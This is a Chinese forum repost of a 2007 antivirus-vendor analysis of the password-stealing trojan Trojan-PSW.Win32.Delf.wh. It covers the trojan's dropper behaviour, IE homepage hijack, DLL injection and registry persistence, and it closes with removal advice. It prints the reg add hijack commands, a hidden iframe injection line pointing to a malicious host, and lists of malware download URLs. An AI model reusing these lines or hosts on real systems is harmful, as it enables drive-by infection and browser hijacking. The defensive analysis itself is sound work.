- 主题
- 0
- 积分
- 0
- 贝壳
- 0 个
- 注册时间
- 2007-9-11
- 最后登录
- 2011-7-12
|
[讨论] Trojan-PSW.Win32.Delf.wh(down.exe,sys332.exe,wm2.htm)病毒分析
出处:DSW Avert 00101号分析员 时间:2007年10月11日
根据超级巡警团队监测与收集的信息,网马生成器的泛滥与中小型网站的安全机制不健全,使得大量网页木马危害网友们的正常网络生活。形成了“挂马网站多,下载木马多,木马变种多”的“三多现象”。超级巡警团队提示网友要提高安全意识、加强计算机安全机制。
一、病毒相关分析:
病毒标签:
病毒名称:Trojan-PSW.Win32.Delf.wh
病毒类型:木马
危害级别:2
感染平台:Windows 平台
病毒大小:16,944 字节
SHA1:251f2fc974065a5da44ca4525efb419d7b3a0a54
加壳类型:UPX //修改过
开发工具:Borland Delphi 6.0 - 7.0
病毒分析:
1、文件运行后会释放一个bat文件
%temp%\2443954.bat
2443954.bat会执行指令Set date=%date%和date 1987-10-18修改系统时间
并多次带参数执行ping 127.0.0.1 //可能是为了屏蔽防火墙
2、调用reg.exe修改IE主页与默认页为http://www.94ak.com //该网站已被挂马
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /t
REG_SZ /d "http://www.94ak.com" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t
REG_SZ /d "http://www.94ak.com" /f
3、网站http://www.94ak.com挂马代码:
<iframe src=http://www.851733.cn/htm/wm/wm2.htm width=0 height=0></iframe>
4、http://www.851733.cn/htm/wm/wm1.htm
http://www.851733.cn/htm/wm/wm2.htm
http://www.851733.cn/htm/wm/wm3.htm
均为经过加密处理的网页木马,通过它们下载其他木马文件。三个网页的免杀方式相同,不同的地方只是不同的网
页使用了不同的变量名及下载文件的地址。用网马生成器或改变一下变量名,就可以轻松改造出大量网马。
http://www.851733.cn/htm/down.exe 16,944 字节
http://www.851733.cn/htm/vip.exe 16,944 字节
均为同一文件,文件MD5值相同
5、下载文件运行后释放文件:
%Program Files%\Internet Explorer\PLUGINS\NewTemp.dll 10,800 字节
%Program Files%\Internet Explorer\PLUGINS\NewTemp.bak 16,944 字节
并将NewTemp.dll注入到所有正在运行中的进程,然后下载以下文件
http://down.851733.cn/1.exe 91,648 字节
http://down.851733.cn/2.exe 11,396 字节
http://down.851733.cn/3.exe 15,360 字节
http://down.851733.cn/4.exe 28,369 字节
http://down.851733.cn/5.exe 11,742 字节
http://down.851733.cn/6.exe 33,395 字节
http://down.851733.cn/7.exe 10,240 字节
http://down.851733.cn/8.exe 14,940 字节
http://down.851733.cn/9.exe 14,600 字节
http://down.851733.cn/10.exe 24,977 字节
http://down.851733.cn/11.exe 16,788 字节
http://down.851733.cn/12.exe 38,032 字节
http://down.851733.cn/13.exe 13,416 字节
http://down.851733.cn/14.exe 180,169 字节
http://down.851733.cn/15.exe 12,457 字节
http://down.851733.cn/16.exe 13,832 字节
http://down.851733.cn/17.exe 12,068 字节
http://down.851733.cn/18.exe 22,244 字节
http://down.851733.cn/19.exe 193,901 字节
http://down.851733.cn/20.exe 16,272 字节
6、注册表操作:
注册表键: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
注册表值: {0EA66AD2-CF26-2E23-532B-B292E22F3266}
类型: REG_SZ
注册表键: HKCR\CLSID\{0EA66AD2-CF26-2E23-532B-B292E22F3266}\InProcServer32
注册表值: (默认)
类型: REG_SZ
值: C:\Program Files\Internet Explorer\PLUGINS\NewTemp.dll
二、解决方案
自动查杀:
1、升级超级巡警到最新病毒库,并进行全盘扫描。
2、如无特殊需要,使用超级巡警屏蔽网站www.94ak.com与down.851733.cn。
三、安全建议
1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。
2、使用超级巡警的补丁检查功能,检查系统补丁,并及时安装补丁。
3、不要随便共享文件或文件夹,即使要使用共享,应先设置好权限,另外不建议设置可写或可控制。
4、不要随便打开不明来历的电子邮件,尤其是邮件附件。
5、不要随便登陆不明网站,特别不要随意登陆需要自己银行帐号或手机及计算机系统帐号的不明网站。
6、使用移动存储介质进行数据访问时,先对其进行病毒检查,建议使用超级巡警U盘免疫器进行免疫。
7、做好系统和重要数据的备份,以便能够进行系统和数据灾难恢复。
超级巡警:彻底查杀各种木马,全面保护系统安全。
更多免费工具下载:http://www.dswlab.com
专业的桌面与内容安全产品:http://www.unnoo.com |
|
